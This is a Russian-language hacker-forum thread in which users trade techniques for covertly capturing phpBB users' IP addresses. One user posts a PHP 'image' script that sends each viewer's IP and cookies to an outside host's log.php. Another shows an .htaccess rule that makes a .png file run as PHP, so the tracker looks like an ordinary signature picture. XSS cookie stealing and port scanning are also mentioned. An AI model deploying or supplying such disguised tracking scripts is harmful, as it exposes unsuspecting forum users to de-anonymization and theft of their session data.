![]() |
узнаем IP в phpBB
Небольшой скрипт, для того, что бы узнать IP пользователя на форуме phpBB... есть 3 нюанса:
1. Узнать IP можно только у пользователя с аватарой... (причем IP на тот момент, когда он аватару прекреплял) 2. Работает не на всех форумах, но на подавляющем большинстве... 3. Вводить нужно не номер пользователя в списке пользователей, а его id вот код: Код:
<html> |
Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..
|
Цитата:
для абуза сойдет... и еще... ты немного не поняла сам код... тут айпи получается из названия файла-аватары |
Scipio, да, код я вполне возможно не поняла.. но.. все же.. учусь понемногу. И предложила альтернативный метод..
ну подсеть-то да.. |
Цитата:
И при чем тут СИ? |
Хм, а у меня друга идея появилась, вы когд-нибудь видели картинки в подписях, типо там ваш айпи светится, можно такую картинку сделать и маршуритизировать через скрипт каторый будет отлавливать пакет и данные сохронять где-нибудь на фтп.
Даже думаю можно сделать так (но это уже труднея, я даже плохова-то знаю как) чтобы и ник человека в лог писался. Если кто реализует, напиши-те что идея моя. |
Цитата:
2all Ну как скрипт работает? |
Sandjuro, ну почему трудно? вот я например отлично знаю, что моя подпись... она идет с самшита, а туда IP пишется. логи кароч.. примерно про это и говорила.. еще можно просто оформить не как подпись, а так.. ссылочку пихнуть, а кто туда заходил - логи сделать! в общем, способов много!
|
Scipio, Ладно потправим идею, Делаем скрипт для определения айпи, Делаем картинку каторая работает с этим скриптом, + возможно чтобы он айди юзера собирал? это ж уже свой будет скрипт с картинкой, а картинку можно любую, чтобы даже не палили что это не просто картинка :)
Ах да, потом этотот скрипт может перенаправлять все по данному адресу (каторый впишем) и там уже сработает обычный php файлик каторый все красиве в txt и упакует Как тебе такая идея? |
ну типа активной Xss`ки? вот узерид можно... на атичате они в куки пишутся, но имхо не везде... а попробовать можно... послушать бы админов античата?
|
Нет, не Xss, Ладно для уточнения так скажу, ты можеш забацать такуежу картинку чтобы она айпи опредиляла и коннект был с твоим серваком
|
Вы наконец поняли как узнать айпи хакера???Надо чтобы потом сразу же порты сканировались и авторутер запускался и потом логи по почте лучше бандеролью.
|
Цитата:
|
Scipio, нее.. xss'ка - это другое.. там уже все куки прет же, и к томуже сниффер нужен. Это уже уязвимости юзает, а следовательно способ имеет ряд недостатков и неуниверсален. И он не тупо IPшник узнает.. так что.. делаем выводы сами..
ну вот к примеру, чтобы узнать Ip мы же не будем у булки(считается одним из самых безопасных форумов) искать уязвимости... Правильно? нам легче картинку залить. или ссылочку.. |
ты это имелл ввиду?
Код:
<?php |
Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней |
Scipio, один из методов по сути..
|
Цитата:
так почту бомбить можно было бы... |
Цитата:
в любом случии не обезательно на почту, лучше в лог, а то отписавшись в популярной теме с просмотрами в 1000, хуже спама будет. Можеш тут юзнуть этот способ? |
Scipio, впринципе.. даже самый простенький фаер не позволит долбиться чему-либо непонятному на SMTP.. но ведь форум - это форум.. хотя у хостера вроде фаеры стоят. нет.. лучше сделать тупо на хостинг..
|
мой зайчег сполил ваши ип )
http://eprst.fatal.ru/upload/palevo/a3.png http://eprst.fatal.ru/upload/palevo/der.txt a3.png PHP код:
Код:
AddType application/x-httpd-php .pngзыы. Цитата:
|
А если на хосте нет .htaccess, то просто создать файл с болокнота? и в корень?
+ Вообщем у меня опять идеи есть, но нехрина я кодить не умею :( вот гавно-то |
c411k, тема! Я даже все поняла.. А то вечно у меня все криво выходит.. ))
|
<?php
Header("Content-type: image/png"); $string=$REMOTE_ADDR; $cooc=$_COOKIE; $tex="Scipio has your ip"; $img = ImageCreateFromPng("image.png"); $colr = ImageColorAllocate($img, 225, 225, 225); $ock=fsockopen($host,80); $pac="GET /log.php?ip=".$string."&coo=".$cooc." HTTP/1.0\r\nHost: blabla.ru\r\n\r\n"; fputs ($ock,$pac); ImageString($img,3,75,43, $tex,$colr); ImagePng($img); ImageDestroy($img); ?> ну только вот че придумал меня блин опередили да чето я забыл что пхп скрипт на удаленном хосте... крыша едет :confused: |
Цитата:
кстати куки получить не удастся... т.к. куки идут с сайта, на котором скрипт-картинка находится... а по другому, как получить id пользователя я не знаю... даже скорее знаю, что никак... а в остольном все работает мой скрипт немного отличается от скрипта c411k, но не пренципиально, так что приводить его здесь я думаю не стоит... да и еще раз повторюсь... на phpBB такая тема не катит, так что пользуйте 1-й скрипт... Да и вобще это разные вещи... с банером - это сниффер, а 1-й скрипт определения IP |
| Время: 01:01 |